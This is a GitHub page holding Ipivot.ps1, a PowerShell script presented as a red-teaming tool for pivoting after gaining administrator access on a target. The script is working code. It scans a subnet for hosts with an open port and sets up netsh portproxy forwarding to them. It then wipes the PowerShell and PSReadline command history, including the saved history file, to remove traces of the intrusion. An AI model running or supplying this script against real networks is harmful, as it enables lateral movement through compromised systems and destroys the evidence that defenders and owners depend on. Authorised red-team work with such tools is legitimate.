-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathIpivot.ps1
148 lines (127 loc) · 6.05 KB
/
Ipivot.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
<#
.PARAMETER ConnectingPort
Change this to the connecting port
.PARAMETER ListeningPort
Change this to the listening port
.PARAMETER ListeningAddress
Change this to the listening IP address you want to set the forwarding to
.PARAMETER Network
Change this to the target network you're working on i.e 192.168.0
.PARAMETER HostRange
Change this to determine the range or leave as default depending on your needs
#>
param (
[int]$ConnectingPort = 9080,
[int]$ListeningPort = 9999,
[string]$ListeningAddress = '127.0.0.1',
[string]$Network = '192.168.0',
[int[]]$HostRange = 1..2
)
Write-Output "
****************************************************************************
# # # # # # #
# # # # # # #
# #
# #
# # # # # # # # # #
# # # ## # # # # #
# # # ## # # # #
# # # ## # # # #
# # # ## # # # #
# # ## # # # # # # # #
# # # # # # ## # # # # # # # #
# # # # # # ## # # # #
## # # # #
## # # # #
## #### 2.0
IPIVOT 2.0 - Red Teaming Tool
By: @fort3 - Fortune Sam Okon
@TrimarcJake - Jake Hildreth
Description: A little pivoting tool for when your favourite meterpreter shell fails...
Prequisites: Identify and Gain Initial Foothold on Target as Administrator
PS: If you happen to find this tool useful then I wouldn't mind a mention ;)
*******************************************************************************
"
$ErrorActionPreference= 'silentlycontinue'
#list the network and ports found and apply the forwarding
$i = 1
foreach ($HostAddress in $HostRange) {
$ip = "{0}.{1}" -f $network, $HostAddress
Write-Progress "Scanning Network" $ip -PercentComplete (($i / $HostRange.Count) * 100)
If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip) {
$socket = new-object System.Net.Sockets.TcpClient($ip, $ConnectingPort)
If ($socket.Connected) {
"$ip port $ConnectingPort is open"
Write-Progress "Forwarding from listening ${ListeningAddress}:$ListeningPort to target\n"
Write-Output "Forwarding from listening ${ListeningAddress}:$ListeningPort to target......."
Write-Output "____________________________________________________________________________________________________________________________"
#piece of the script that does the forwarding
try {
Invoke-Expression "netsh interface portproxy add v4tov4 listenaddress=$($ListeningAddress) listenport=$($ListeningPort) connectaddress=$($ip) connectport=$($ConnectingPort)"
} catch {
Write-Warning "Could not forward ${ListeningAddress}:$ListeningPort to target......."
}
Write-Progress "Checking if host is listening on port $ListeningPort and $ConnectingPort`n"
Write-Output "Checking if host is listening on port $ListeningPort and $ConnectingPort"
#verify that the port is listening
Get-NetTCPConnection -LocalPort $ListeningPort
Get-NetTCPConnection -LocalPort $ConnectingPort
Write-Output "***************************************************************************************************************************"
$socket.Close()
} else {
"$ip port $ConnectingPort is not open "
}
}
}
Write-Output "***************************************************************************************************************************"
Write-Progress "Now clearing command history and footprints from powershell saved sessions......."
Write-Output "Now clearing command history and footprints from powershell saved sessions......."
#Clears the command history, including the saved-to-file history, if applicable.
#CAUTION!!! As this is a high impact activity, you will asked to confirm this action
function Clear-SavedHistory {
[CmdletBinding(ConfirmImpact='High', SupportsShouldProcess)]
param(
)
$havePSReadline = ($null -ne (Get-Module -EA SilentlyContinue PSReadline))
Write-Verbose "PSReadline present: $havePSReadline"
$target = if ($havePSReadline)
{
"entire command history, including from previous sessions"
}
else
{
"command history"
}
if (-not $pscmdlet.ShouldProcess($target))
{
return
}
if ($havePSReadline)
{
Clear-Host
# Remove PSReadline's saved-history file.Get-History
if (Test-Path (Get-PSReadlineOption).HistorySavePath)
{
# Abort, if the file for some reason cannot be removed.
Remove-Item -EA Stop (Get-PSReadlineOption).HistorySavePath
# To be safe, we recreate the file (empty).
$null = New-Item -Type File -Path (Get-PSReadlineOption).HistorySavePath
}
# Clear PowerShell's own history
Clear-History
# Clear PSReadline's *session* history.
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
}
else
{ # Without PSReadline, we only have a *session* history.
Clear-Host
# Clear the doskey library's buffer, used pre-PSReadline.
# !! Unfortunately, this requires sending key combination Alt+F7.
# Thanks, https://stackoverflow.com/a/13257933/45375
$null = [system.reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[System.Windows.Forms.SendKeys]::Sendwait('%{F7 2}')
# Clear PowerShell's own history
Clear-History
}
}
Clear-SavedHistory